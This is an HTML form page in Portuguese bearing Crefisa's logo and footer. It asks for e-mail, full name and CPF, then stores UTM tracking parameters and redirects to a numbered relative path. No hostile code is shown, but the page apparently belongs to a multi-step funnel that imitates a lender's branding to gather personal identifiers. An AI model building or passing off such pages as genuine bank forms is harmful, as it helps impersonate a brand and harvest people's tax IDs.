<!DOCTYPE html><html lang="pt-BR"><head>
    <meta charset="UTF-8">
    <link href="css/bootstrap.min.css" rel="stylesheet">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <style>
        .header {
        background: white;
        color: white;
        padding: 15px 0;
        text-align: center;
        font-size: 1.5rem;
        font-weight: bold;
        grid-area: top-bar;
    }
    .main-content {
        max-width: 450px;
        background-color: white;
        text-align: center;
        padding: 2rem 2rem 1rem 2rem;
        border-radius: 10px;
        box-shadow: 0 2px 40px rgba(0, 0, 0, 0.1);
        margin: 0 auto;
    }
    .main-content h2 {
        margin-bottom: 20px;
    }
    .btn-custom {
        color: white;
        border: none;
        width: 100%;
        margin-bottom: 10px;
        background: #38C0E5;
        font-weight: 600;
        border-radius: 1rem;
        padding: .75rem 3rem;
        letter-spacing: .3px;
        line-height: 1.15;
    }
    .btn-custom:hover{
        color: black !important;
        background-color: #38C0E5 !important;
        transform: scale(1.02) !important;
    }
    
    .footer {
        background-color: #ffffff;
        border-top: solid 1px #e6dddd;
        color: #000;
        text-align: center;
        width: 100%;
        bottom: 0;
        grid-area: footer;
        border-bottom: solid 3px #e6007e;
        padding: 2rem 0.5rem;
        position: relative;
        margin-top: 50px;
    }
    
    #conclusao {
        display: none; /* Esconde o elemento por padrão */
    }
    
    #conclusao h4 {
        color: green; /* Define a cor do texto */
        font-weight: bold; /* Define o texto em negrito */
    }
    
    .char {
        border-top: solid px #00adca;
        background-color: #00adca;
        padding: 2px !important;
    }/* End custom CSS */
    </style>
   

<body>
<div style="
  display: grid;
  grid-template-areas:
    'top-bar'
    'content'
    'footer';
  grid-template-rows: auto 1fr auto;
  min-height: 100vh;
">    
    <div class="header">
        <img decoding="async" style="width: 120px;" src="images/Crefisa.png" alt="Imagem Centralizada" data-lazy-src="https://upload.wikimedia.org/wikipedia/pt/a/a3/Crefisa.png" data-ll-status="loaded" class="entered lazyloaded"><noscript><img decoding="async" style="width: 120px;" src="https://upload.wikimedia.org/wikipedia/pt/a/a3/Crefisa.png" alt="Imagem Centralizada"></noscript>
    </div>

    <div style="grid-area: content; padding: 0 1rem;"> 
        <!-- Seção 7: Formulário de Cadastro -->
        <div style="margin-top: 18px;" class="main-content">
            <div id="formulario" class="mb-3">
                <p style="color:gray; text-align:initial">Preencha os campos abaixo</p>
                <form id="cadastroForm" style="text-align:initial" action="../5">
                    
                    <div class="mb-3">
                        <label for="cpf" class="form-label" style="color:gray; font-size:13px">E-mail</label>
                        <input type="text" class="form-control" id="cpf" placeholder="email@email.com">
                    </div>
                    <div class="mb-3">
                        <label for="nome" class="form-label" style="color:gray; font-size:13px">Nome completo</label>
                        <input type="text" class="form-control" id="nome" placeholder="Ex: Maria">
                    </div>
                    <div class="mb-3">
                        <label for="cpf" class="form-label" style="color:gray; font-size:13px">CPF</label>
                        <input type="text" class="form-control" id="cpf" placeholder="000.000.000-00">
                    </div>
                    
                    <div id="loader" style="display: none; text-align: center; margin-bottom: 15px;">
                        <i class="fas fa-spinner fa-spin" style="font-size: 2em; color: #FE9005;"></i>
                    </div>
                   <button class="btn-custom" onclick="redirectWithUTM()">Continuar</button>

<script>
    function redirectWithUTM() {
        const utmParams = JSON.parse(localStorage.getItem('utmParams')) || {};
        const queryString = new URLSearchParams(utmParams).toString();
        window.location.href = `../5?${queryString}`;
    }

    function storeUTMParams() {
        const params = new URLSearchParams(window.location.search);
        const utmParams = {};
        params.forEach((value, key) => {
            if (key.startsWith('utm_')) {
                utmParams[key] = value;
            }
        });
        localStorage.setItem('utmParams', JSON.stringify(utmParams));
        console.log('Parâmetros UTM armazenados no localStorage:', utmParams);
    }

    window.onload = function() {
        storeUTMParams();
    };
</script>
</form></div>
    
        </div>
    </div> 
    <script type="rocketlazyloadscript" src="../assets/scriptValida.js" defer=""></script>
    <div class="footer py-4" id="footerChg">
        © 2024 CREFISA S.A. CNPJ: 60.779.196/0001-96 <br>
         Todos os direitos reservados
    </div>
</div>



</body></html>
